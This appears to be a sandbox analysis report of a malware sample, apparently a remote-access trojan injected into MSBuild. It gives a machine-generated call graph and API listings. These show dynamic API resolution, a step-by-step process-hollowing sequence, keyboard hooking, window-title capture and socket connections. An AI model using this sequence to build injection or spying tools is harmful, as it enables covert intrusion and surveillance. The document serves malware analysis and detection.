53139->53140 53141 41403d 53140->53141 53142 401d64 28 API calls 53141->53142 53143 41404b 53142->53143 53144 401fbd 28 API calls 53143->53144 53145 414053 53144->53145 53146 41afc3 28 API calls 53145->53146 53147 41405b 53146->53147 53718 404262 WSAStartup 53147->53718 53149 414065 53150 401d64 28 API calls 53149->53150 53151 41406e 53150->53151 53152 401d64 28 API calls 53151->53152 53214 4140ed 53151->53214 53153 414087 53152->53153 53156 401d64 28 API calls 53153->53156 53154 401d64 28 API calls 53154->53214 53155 401fbd 28 API calls 53155->53214 53157 414098 53156->53157 53159 401d64 28 API calls 53157->53159 53158 41afc3 28 API calls 53158->53214 53160 4140a9 53159->53160 53161 401d64 28 API calls 53160->53161 53163 4140ba 53161->53163 53162 4085b4 28 API calls 53162->53214 53165 401d64 28 API calls 53163->53165 53164 401eef 26 API calls 53164->53214 53166 4140cb 53165->53166 53167 401d64 28 API calls 53166->53167 53168 4140dd 53167->53168 53831 404101 87 API calls 53168->53831 53171 414244 WSAGetLastError 53832 41bc76 30 API calls 53171->53832 53178 404cbf 28 API calls 53178->53214 53179 401d8c 26 API calls 53179->53214 53180 401d64 28 API calls 53181 414b68 53180->53181 53181->53180 53182 43a5e7 _strftime 42 API calls 53181->53182 53183 414b80 Sleep 53182->53183 53183->53214 53184 405ce6 28 API calls 53184->53214 53185 401f66 28 API calls 53185->53214 53188 4082dc 28 API calls 53188->53214 53189 440c51 26 API calls 53189->53214 53190 41265d 3 API calls 53190->53214 53191 412513 31 API calls 53191->53214 53192 403b40 28 API calls 53192->53214 53195 401d64 28 API calls 53196 4144ed GetTickCount 53195->53196 53197 41ad46 28 API calls 53196->53197 53197->53214 53199 41ad46 28 API calls 53199->53214 53202 41aec8 28 API calls 53202->53214 53204 40275c 28 API calls 53204->53214 53205 4027cb 28 API calls 53205->53214 53206 404468 60 API calls 53206->53214 53207 401eea 26 API calls 53207->53214 53208 401e13 26 API calls 53208->53214 53210 414ae4 53853 40a767 84 API 
calls 53210->53853 53212 41a686 79 API calls 53212->53214 53213 414b22 CreateThread 53213->53214 54330 419e89 103 API calls 53213->54330 53214->53154 53214->53155 53214->53158 53214->53162 53214->53164 53214->53171 53214->53178 53214->53179 53214->53181 53214->53184 53214->53185 53214->53188 53214->53189 53214->53190 53214->53191 53214->53192 53214->53195 53214->53199 53214->53202 53214->53204 53214->53205 53214->53206 53214->53207 53214->53208 53214->53210 53214->53212 53214->53213 53719 413f9a 53214->53719 53725 4041f1 53214->53725 53732 404915 53214->53732 53747 40428c connect 53214->53747 53807 41a96d 53214->53807 53810 413683 53214->53810 53813 40cbf1 53214->53813 53819 41adee 53214->53819 53822 41aca0 GetLastInputInfo GetTickCount 53214->53822 53823 41ac52 53214->53823 53828 40e679 GetLocaleInfoA 53214->53828 53833 404c9e 28 API calls 53214->53833 53834 4027ec 53214->53834 53838 4045d5 53214->53838 53854 4047eb WaitForSingleObject 53214->53854 53215->52649 53216->52660 53219 4085c0 53218->53219 53220 402e78 28 API calls 53219->53220 53221 4085e4 53220->53221 53221->52681 53223 4124e1 RegQueryValueExA RegCloseKey 53222->53223 53224 41250b 53222->53224 53223->53224 53224->52677 53225->52685 53226->52713 53227->52706 53228->52698 53229->52711 53231 40c8ba 53230->53231 53232 40c8da 53231->53232 53233 40c90f 53231->53233 53240 40c8d0 53231->53240 54342 41a74b 29 API calls 53232->54342 53236 41b15b 2 API calls 53233->53236 53235 40ca03 GetLongPathNameW 53238 403b40 28 API calls 53235->53238 53239 40c914 53236->53239 53237 40c8e3 53241 401e18 26 API calls 53237->53241 53242 40ca18 53238->53242 53243 40c918 53239->53243 53244 40c96a 53239->53244 53240->53235 53246 40c8ed 53241->53246 53247 403b40 28 API calls 53242->53247 53245 403b40 28 API calls 53243->53245 53248 403b40 28 API calls 53244->53248 53250 40c926 53245->53250 53252 401e13 26 API calls 53246->53252 53251 40ca27 53247->53251 53249 40c978 53248->53249 53256 403b40 28 API calls 53249->53256 53257 403b40 28 
API calls 53250->53257 54331 40cc37 53251->54331 53252->53240 53259 40c98e 53256->53259 53260 40c93c 53257->53260 53258 40ca45 53261 402860 28 API calls 53258->53261 53262 402860 28 API calls 53259->53262 53263 402860 28 API calls 53260->53263 53264 40ca4f 53261->53264 53265 40c999 53262->53265 53266 40c947 53263->53266 53267 401e13 26 API calls 53264->53267 53268 401e18 26 API calls 53265->53268 53269 401e18 26 API calls 53266->53269 53270 40ca59 53267->53270 53271 40c9a4 53268->53271 53272 40c952 53269->53272 53273 401e13 26 API calls 53270->53273 53274 401e13 26 API calls 53271->53274 53275 401e13 26 API calls 53272->53275 53276 40ca62 53273->53276 53277 40c9ad 53274->53277 53278 40c95b 53275->53278 53279 401e13 26 API calls 53276->53279 53280 401e13 26 API calls 53277->53280 53281 401e13 26 API calls 53278->53281 53282 40ca6b 53279->53282 53280->53246 53281->53246 53283 401e13 26 API calls 53282->53283 53284 40ca74 53283->53284 53285 401e13 26 API calls 53284->53285 53286 40ca7d 53285->53286 53286->52759 53287->52770 53288->52793 53290 412683 RegQueryValueExA RegCloseKey 53289->53290 53291 4126a7 53289->53291 53290->53291 53291->52752 53292->52787 53293->52821 53294->52832 53296 401f66 28 API calls 53295->53296 53297 40c86b 53296->53297 53298 41ae08 28 API calls 53297->53298 53299 40c876 53298->53299 53300 40c89e 32 API calls 53299->53300 53301 40c887 53300->53301 53302 401e13 26 API calls 53301->53302 53303 40c890 53302->53303 53304 401eea 26 API calls 53303->53304 53305 40c898 53304->53305 53305->52857 53306->52843 53307->52877 53309 401e0c 53308->53309 53310->52704 53313 40e183 53312->53313 53314 41a65c LoadResource LockResource SizeofResource 53312->53314 53313->52933 53314->53313 53316 401f86 28 API calls 53315->53316 53317 406066 53316->53317 53317->52944 53328 403c30 53318->53328 53322 41bfae 53321->53322 53323 41bfd2 53322->53323 53324 41bfcb 53322->53324 53344 41c552 53323->53344 53363 41bfe3 28 API calls 53324->53363 53326 41bfd0 53326->52965 53329 
403c39 53328->53329 53332 403c59 53329->53332 53333 403c68 53332->53333 53338 4032a4 53333->53338 53335 403c74 53336 402325 28 API calls 53335->53336 53337 403b73 53336->53337 53337->52965 53339 4032b0 53338->53339 53340 4032ad 53338->53340 53343 4032b6 28 API calls 53339->53343 53340->53335 53345 41c55c __EH_prolog 53344->53345 53346 41c673 53345->53346 53347 41c595 53345->53347 53370 402649 28 API calls std::_Xinvalid_argument 53346->53370 53364 4026a7 28 API calls 53347->53364 53351 41c5a9 53365 41c536 28 API calls 53351->53365 53353 41c5dc 53354 41c603 53353->53354 53355 41c5f7 53353->53355 53367 41c7cf 26 API calls 53354->53367 53366 41c7b2 26 API calls 53355->53366 53358 41c601 53369 41c75a 26 API calls 53358->53369 53359 41c60f 53368 41c7cf 26 API calls 53359->53368 53362 41c63e 53362->53326 53363->53326 53364->53351 53365->53353 53366->53358 53367->53359 53368->53358 53369->53362 53371->52969 53374 402e85 53373->53374 53375 402ea9 53374->53375 53376 402e98 53374->53376 53378 402eae 53374->53378 53375->52978 53380 403445 28 API calls 53376->53380 53378->53375 53381 40225b 26 API calls 53378->53381 53380->53375 53381->53375 53383 404bd0 53382->53383 53386 40245c 53383->53386 53385 404be4 53385->52981 53387 402469 53386->53387 53389 402478 53387->53389 53390 402ad3 28 API calls 53387->53390 53389->53385 53390->53389 53393 4021c6 53391->53393 53392 4021e8 53392->52985 53393->53392 53394 40262e 26 API calls 53393->53394 53394->53392 53396 401e94 53395->53396 53398 41b183 53397->53398 53399 41b168 GetCurrentProcess IsWow64Process 53397->53399 53398->52995 53399->53398 53400 41b17f 53399->53400 53400->52995 53402 412541 RegQueryValueExA RegCloseKey 53401->53402 53403 412569 53401->53403 53402->53403 53404 401f66 28 API calls 53403->53404 53405 41257e 53404->53405 53405->52998 53406->53006 53408 40b02f 53407->53408 53411 40b04b 53408->53411 53410 40b045 53410->53017 53412 40b055 53411->53412 53414 40b060 53412->53414 53415 40b138 28 API calls 53412->53415 
53414->53410 53415->53414 53416->53021 53417->53024 53419 40230d 53418->53419 53420 402325 28 API calls 53419->53420 53421 401f80 53420->53421 53421->52763 53440 43a545 53422->53440 53424 43998b 53449 4392de 38 API calls 3 library calls 53424->53449 53426 439950 53426->53424 53427 439965 53426->53427 53439 40dd54 53426->53439 53447 445354 20 API calls _abort 53427->53447 53429 43996a 53448 43a827 26 API calls _Deallocate 53429->53448 53432 439997 53433 4399c6 53432->53433 53450 43a58a 42 API calls __Tolower 53432->53450 53436 439a32 53433->53436 53451 43a4f1 26 API calls 2 library calls 53433->53451 53452 43a4f1 26 API calls 2 library calls 53436->53452 53437 439af9 _strftime 53437->53439 53453 445354 20 API calls _abort 53437->53453 53439->52780 53439->52781 53441 43a54a 53440->53441 53442 43a55d 53440->53442 53454 445354 20 API calls _abort 53441->53454 53442->53426 53444 43a54f 53455 43a827 26 API calls _Deallocate 53444->53455 53446 43a55a 53446->53426 53447->53429 53448->53439 53449->53432 53450->53432 53451->53436 53452->53437 53453->53439 53454->53444 53455->53446 53460 401e9b 53456->53460 53458 4027d9 53458->53062 53459->53066 53461 401ea7 53460->53461 53462 40245c 28 API calls 53461->53462 53463 401eb9 53462->53463 53463->53458 53465 409855 53464->53465 53466 4124b7 3 API calls 53465->53466 53467 40985c 53466->53467 53468 409870 53467->53468 53469 40988a 53467->53469 53470 4095cf 53468->53470 53471 409875 53468->53471 53483 4082dc 53469->53483 53470->52816 53473 4082dc 28 API calls 53471->53473 53475 409883 53473->53475 53509 409959 29 API calls 53475->53509 53478 409888 53478->53470 53479->53090 53663 402d8b 53480->53663 53482 4028dd 53482->53094 53484 4082eb 53483->53484 53510 408431 53484->53510 53486 408309 53487 4098a5 53486->53487 53515 40affa 53487->53515 53490 4098f6 53493 401f66 28 API calls 53490->53493 53491 4098ce 53492 401f66 28 API calls 53491->53492 53494 4098d8 53492->53494 53495 409901 53493->53495 53496 41ae08 28 API calls 53494->53496 
53497 401f66 28 API calls 53495->53497 53498 4098e6 53496->53498 53499 409910 53497->53499 53519 40a876 31 API calls _Yarn 53498->53519 53500 41a686 79 API calls 53499->53500 53502 409915 CreateThread 53500->53502 53504 409930 CreateThread 53502->53504 53505 40993c CreateThread 53502->53505 53525 4099a9 53502->53525 53503 4098ed 53506 401eea 26 API calls 53503->53506 53504->53505 53531 409993 53504->53531 53507 401e13 26 API calls 53505->53507 53528 4099b5 53505->53528 53506->53490 53508 409950 53507->53508 53508->53470 53509->53478 53662 40999f 135 API calls 53509->53662 53511 40843d 53510->53511 53513 40845b 53511->53513 53514 402f0d 28 API calls 53511->53514 53513->53486 53514->53513 53517 40b006 53515->53517 53516 4098c3 53516->53490 53516->53491 53517->53516 53520 403b9e 53517->53520 53519->53503 53521 403ba8 53520->53521 53523 403bb3 53521->53523 53524 403cfd 28 API calls 53521->53524 53523->53516 53524->53523 53534 409e48 53525->53534 53591 40a3f4 53528->53591 53640 4099e4 53531->53640 53535 409e5d Sleep 53534->53535 53554 409d97 53535->53554 53537 4099b2 53538 409e9d CreateDirectoryW 53543 409e6f 53538->53543 53539 409eae GetFileAttributesW 53539->53543 53540 401d64 28 API calls 53540->53543 53541 409ec5 SetFileAttributesW 53541->53543 53543->53535 53543->53537 53543->53538 53543->53539 53543->53540 53543->53541 53549 409f10 53543->53549 53567 41b58f 53543->53567 53544 409f3f PathFileExistsW 53544->53549 53546 401f86 28 API calls 53546->53549 53547 40a048 SetFileAttributesW 53547->53543 53548 401eea 26 API calls 53548->53549 53549->53544 53549->53546 53549->53547 53549->53548 53550 401eef 26 API calls 53549->53550 53551 406052 28 API calls 53549->53551 53553 401eea 26 API calls 53549->53553 53576 41b61a CreateFileW 53549->53576 53584 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 53549->53584 53550->53549 53551->53549 53553->53543 53555 409e44 53554->53555 53558 409dad 53554->53558 53555->53543 53556 409dcc CreateFileW 53557 409dda GetFileSize 
53556->53557 53556->53558 53557->53558 53559 409e0f CloseHandle 53557->53559 53558->53556 53558->53559 53560 409e21 53558->53560 53561 409e04 Sleep 53558->53561 53562 409dfd 53558->53562 53559->53558 53560->53555 53564 4082dc 28 API calls 53560->53564 53561->53559 53585 40a7f0 83 API calls 53562->53585 53565 409e3d 53564->53565 53566 4098a5 126 API calls 53565->53566 53566->53555 53568 41b5a2 CreateFileW 53567->53568 53570 41b5db 53568->53570 53571 41b5df 53568->53571 53570->53543 53572 41b5f6 WriteFile 53571->53572 53573 41b5e6 SetFilePointer 53571->53573 53574 41b60b CloseHandle 53572->53574 53575 41b609 53572->53575 53573->53572 53573->53574 53574->53570 53575->53574 53577 41b640 53576->53577 53578 41b644 GetFileSize 53576->53578 53577->53549 53586 401e65 53578->53586 53580 41b658 53581 41b66a ReadFile 53580->53581 53582 41b677 53581->53582 53583 41b679 CloseHandle 53581->53583 53582->53583 53583->53577 53584->53549 53585->53561 53587 401e6d 53586->53587 53589 401e77 53587->53589 53590 4023b7 28 API calls 53587->53590 53589->53580 53590->53589 53619 40a402 53591->53619 53592 4099be 53593 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 53594 40b027 28 API calls 53593->53594 53594->53619 53597 41aca0 GetLastInputInfo GetTickCount 53597->53619 53599 40a4a2 GetWindowTextW 53599->53619 53601 401e13 26 API calls 53601->53619 53602 40a5ff 53604 401e13 26 API calls 53602->53604 53603 40affa 28 API calls 53603->53619 53604->53592 53605 40a569 Sleep 53605->53619 53608 401f66 28 API calls 53608->53619 53609 40a4f1 53611 4082dc 28 API calls 53609->53611 53609->53619 53624 40a876 31 API calls _Yarn 53609->53624 53611->53609 53613 405ce6 28 API calls 53613->53619 53615 4028cf 28 API calls 53615->53619 53616 41ae08 28 API calls 53616->53619 53617 409d58 27 API calls 53617->53619 53618 401eea 26 API calls 53618->53619 53619->53592 53619->53593 53619->53597 53619->53599 53619->53601 53619->53602 53619->53603 53619->53605 53619->53608 53619->53609 53619->53613 53619->53615 
53619->53616 53619->53617 53619->53618 53620 433519 5 API calls __Init_thread_wait 53619->53620 53621 4338a5 29 API calls __onexit 53619->53621 53622 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 53619->53622 53623 4082a8 28 API calls 53619->53623 53625 40b0dd 28 API calls 53619->53625 53626 40ae58 44 API calls 2 library calls 53619->53626 53627 440c51 53619->53627 53631 404c9e 28 API calls 53619->53631 53620->53619 53621->53619 53622->53619 53623->53619 53624->53609 53625->53619 53626->53619 53628 440c5d 53627->53628 53632 440a4d 53628->53632 53631->53619 53633 440a64 53632->53633 53637 440aa5 53633->53637 53638 445354 20 API calls _abort 53633->53638 53635 440a9b 53639 43a827 26 API calls _Deallocate 53635->53639 53637->53619 53638->53635 53639->53637 53641 409a63 GetMessageA 53640->53641 53642 4099ff SetWindowsHookExA 53640->53642 53643 409a75 TranslateMessage DispatchMessageA 53641->53643 53644 40999c 53641->53644 53642->53641 53646 409a1b GetLastError 53642->53646 53643->53641 53643->53644 53656 41ad46 53646->53656 53650 409a3e 53651 401f66 28 API calls 53650->53651 53652 409a4d 53651->53652 53653 41a686 79 API calls 53652->53653 53654 409a52 53653->53654 53655 401eea 26 API calls 53654->53655 53655->53644 53657 440c51 26 API calls 53656->53657 53658 41ad67 53657->53658 53659 401f66 28 API calls 53658->53659 53660 409a31 53659->53660 53661 404c9e 28 API calls 53660->53661 53661->53650 53664 402d97 53663->53664 53667 4030f7 53664->53667 53666 402dab 53666->53482 53668 403101 53667->53668 53670 403115 53668->53670 53671 4036c2 28 API calls 53668->53671 53670->53666 53671->53670 53673 403b48 53672->53673 53679 403b7a 53673->53679 53676 403cbb 53683 403dc2 53676->53683 53678 403cc9 53678->53103 53680 403b86 53679->53680 53681 403b9e 28 API calls 53680->53681 53682 403b5a 53681->53682 53682->53676 53684 403dce 53683->53684 53687 402ffd 53684->53687 53686 403de3 53686->53678 53688 40300e 53687->53688 53689 4032a4 28 API calls 53688->53689 
53690 40301a 53689->53690 53692 40302e 53690->53692 53693 4035e8 28 API calls 53690->53693 53692->53686 53693->53692 53700 4395ba 53694->53700 53698 412814 53697->53698 53699 4127ed RegSetValueExA RegCloseKey 53697->53699 53698->53129 53699->53698 53703 43953b 53700->53703 53702 401608 53702->53127 53704 43954a 53703->53704 53705 43955e 53703->53705 53711 445354 20 API calls _abort 53704->53711 53709 43955a __alldvrm 53705->53709 53713 447601 11 API calls 2 library calls 53705->53713 53708 43954f 53712 43a827 26 API calls _Deallocate 53708->53712 53709->53702 53711->53708 53712->53709 53713->53709 53715 41aab9 ctype ___scrt_fastfail 53714->53715 53716 401f66 28 API calls 53715->53716 53717 41ab2e 53716->53717 53717->53133 53718->53149 53720 413fb3 WSASetLastError 53719->53720 53721 413fa9 53719->53721 53720->53214 53867 413e37 35 API calls ___std_exception_copy 53721->53867 53723 413fae 53723->53720 53726 404206 socket 53725->53726 53727 4041fd 53725->53727 53728 404220 53726->53728 53729 404224 CreateEventW 53726->53729 53868 404262 WSAStartup 53727->53868 53728->53214 53729->53214 53731 404202 53731->53726 53731->53728 53733 4049b1 53732->53733 53734 40492a 53732->53734 53733->53214 53735 404933 53734->53735 53736 404987 CreateEventA CreateThread 53734->53736 53737 404942 GetLocalTime 53734->53737 53735->53736 53736->53733 53870 404b1d 53736->53870 53738 41ad46 28 API calls 53737->53738 53739 40495b 53738->53739 53869 404c9e 28 API calls 53739->53869 53741 404968 53742 401f66 28 API calls 53741->53742 53743 404977 53742->53743 53744 41a686 79 API calls 53743->53744 53745 40497c 53744->53745 53746 401eea 26 API calls 53745->53746 53746->53736 53748 4043e1 53747->53748 53749 4042b3 53747->53749 53750 404343 53748->53750 53751 4043e7 WSAGetLastError 53748->53751 53749->53750 53752 4042e8 53749->53752 53755 404cbf 28 API calls 53749->53755 53750->53214 53751->53750 53753 4043f7 53751->53753 53874 420151 27 API calls 53752->53874 53756 4042f7 53753->53756 53757 4043fc 
53753->53757 53759 4042d4 53755->53759 53763 401f66 28 API calls 53756->53763 53879 41bc76 30 API calls 53757->53879 53758 4042f0 53758->53756 53762 404306 53758->53762 53764 401f66 28 API calls 53759->53764 53761 40440b 53880 404c9e 28 API calls 53761->53880 53772 404315 53762->53772 53773 40434c 53762->53773 53766 404448 53763->53766 53767 4042e3 53764->53767 53770 401f66 28 API calls 53766->53770 53768 41a686 79 API calls 53767->53768 53768->53752 53769 404418 53771 401f66 28 API calls 53769->53771 53774 404457 53770->53774 53775 404427 53771->53775 53777 401f66 28 API calls 53772->53777 53876 420f34 56 API calls 53773->53876 53778 41a686 79 API calls 53774->53778 53779 41a686 79 API calls 53775->53779 53781 404324 53777->53781 53778->53750 53782 40442c 53779->53782 53780 404354 53783 404389 53780->53783 53784 404359 53780->53784 53785 401f66 28 API calls 53781->53785 53787 401eea 26 API calls 53782->53787 53878 4202ea 28 API calls 53783->53878 53788 401f66 28 API calls 53784->53788 53789 404333 53785->53789 53787->53750 53791 404368 53788->53791 53792 41a686 79 API calls 53789->53792 53790 404391 53793 4043be CreateEventW CreateEventW 53790->53793 53796 401f66 28 API calls 53790->53796 53794 401f66 28 API calls 53791->53794 53795 404338 53792->53795 53793->53750 53797 404377 53794->53797 53875 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53795->53875 53799 4043a7 53796->53799 53800 41a686 79 API calls 53797->53800 53801 401f66 28 API calls 53799->53801 53802 40437c 53800->53802 53803 4043b6 53801->53803 53877 420592 54 API calls 53802->53877 53805 41a686 79 API calls 53803->53805 53806 4043bb 53805->53806 53806->53793 53881 41a945 GlobalMemoryStatusEx 53807->53881 53809 41a982 53809->53214 53882 413646 53810->53882 53814 40cc0d 53813->53814 53815 41246e 3 API calls 53814->53815 53817 40cc14 53815->53817 53816 40cc2c 53816->53214 53817->53816 53818 4124b7 3 API calls 53817->53818 53818->53816 53820 401f86 28 API calls 53819->53820 53821 
41ae03 53820->53821 53821->53214 53822->53214 53824 436050 ___scrt_fastfail 53823->53824 53825 41ac71 GetForegroundWindow GetWindowTextW 53824->53825 53826 403b40 28 API calls 53825->53826 53827 41ac9b 53826->53827 53827->53214 53829 401f66 28 API calls 53828->53829 53830 40e69e 53829->53830 53830->53214 53831->53214 53832->53214 53833->53214 53835 4027f8 53834->53835 53836 402e78 28 API calls 53835->53836 53837 402814 53836->53837 53837->53214 53841 4045ec 53838->53841 53839 43a88c _Yarn 21 API calls 53839->53841 53841->53839 53842 401f86 28 API calls 53841->53842 53843 401eef 26 API calls 53841->53843 53844 404666 53841->53844 53847 401eea 26 API calls 53841->53847 53923 40455b 53841->53923 53929 404688 53841->53929 53842->53841 53843->53841 53845 4047eb 98 API calls 53844->53845 53846 40466d 53845->53846 53848 401eea 26 API calls 53846->53848 53847->53841 53849 404676 53848->53849 53850 401eea 26 API calls 53849->53850 53851 40467f 53850->53851 53851->53214 53853->53214 53855 404805 SetEvent CloseHandle 53854->53855 53856 40481c closesocket 53854->53856 53857 40489c 53855->53857 53858 404829 53856->53858 53857->53214 53859 40483f 53858->53859 54327 404ab1 83 API calls 53858->54327 53861 404851 WaitForSingleObject 53859->53861 53862 404892 SetEvent CloseHandle 53859->53862 54328 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53861->54328 53862->53857 53864 404860 SetEvent WaitForSingleObject 54329 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53864->54329 53866 404878 SetEvent CloseHandle CloseHandle 53866->53862 53867->53723 53868->53731 53869->53741 53873 404b29 101 API calls 53870->53873 53872 404b26 53873->53872 53874->53758 53875->53750 53876->53780 53877->53795 53878->53790 53879->53761 53880->53769 53881->53809 53885 413619 53882->53885 53886 41362e ___scrt_initialize_default_local_stdio_options 53885->53886 53889 43e2dd 53886->53889 53892 43b030 53889->53892 53893 43b058 53892->53893 53895 43b070 

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000), ref: 0041BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000), ref: 0041BE09
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63

Strings

Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
• Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
• NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
• NtClose.NTDLL(?), ref: 0041744A
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
• GetCurrentProcess.KERNEL32(?), ref: 004175A5
• NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
• NtClose.NTDLL(?), ref: 004175B6
• TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
• GetLastError.KERNEL32 ref: 004175C7

Strings

Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`v$ntdll
                                                                                                                                            • API String ID: 3150337530-48330694
